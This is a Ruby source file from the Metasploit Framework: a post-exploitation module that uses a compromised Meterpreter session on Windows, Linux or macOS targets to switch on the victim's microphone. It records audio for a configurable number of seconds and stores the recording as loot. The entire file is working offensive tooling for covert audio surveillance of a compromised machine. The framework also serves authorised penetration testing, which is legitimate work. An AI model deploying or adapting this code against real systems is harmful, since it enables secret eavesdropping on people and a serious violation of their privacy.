modules/post/multi/manage/record_mic.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
include Msf::Auxiliary::Report
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Multi Manage Record Microphone',
'Description' => %q{
This module will enable and record your target's microphone.
For non-Windows targets, please use Java meterpreter to be
able to use this feature.
},
'License' => MSF_LICENSE,
'Author' => [ 'sinn3r'],
'Platform' => %w[linux osx win],
'SessionTypes' => [ 'meterpreter' ],
'Compat' => {
'Meterpreter' => {
'Commands' => %w[
stdapi_webcam_*
]
}
}
)
)
register_options(
[
OptInt.new('DURATION', [false, 'Number of seconds to record', 5])
]
)
end
def rhost
client.sock.peerhost
end
def progress
duration = datastore['DURATION']
m = duration / 10
m = 1 if m == 0
duration.times do |i|
if i % m == 0
p = ((Float((i == 0) ? 1 : i + 1) / duration) * 100).round
print_status("#{rhost} - #{p}%...")
end
select(nil, nil, nil, 1)
end
end
def run
if client.nil?
print_error("Invalid session ID selected. Make sure the host isn't dead.")
return
end
data = nil
begin
t = framework.threads.spawn('prog', false) { progress }
data = client.webcam.record_mic(datastore['DURATION'])
rescue Rex::Post::Meterpreter::RequestError => e
print_error(e.message)
return
ensure
t.kill
end
if data
print_status("#{rhost} - Audio size: (#{data.length} bytes)")
p = store_loot(
"#{rhost}.audio",
'application/octet-stream',
rhost,
data,
"#{rhost}_audio.wav",
"#{rhost} Audio Recording"
)
print_good("#{rhost} - Audio recording saved: #{p}")
end
end
end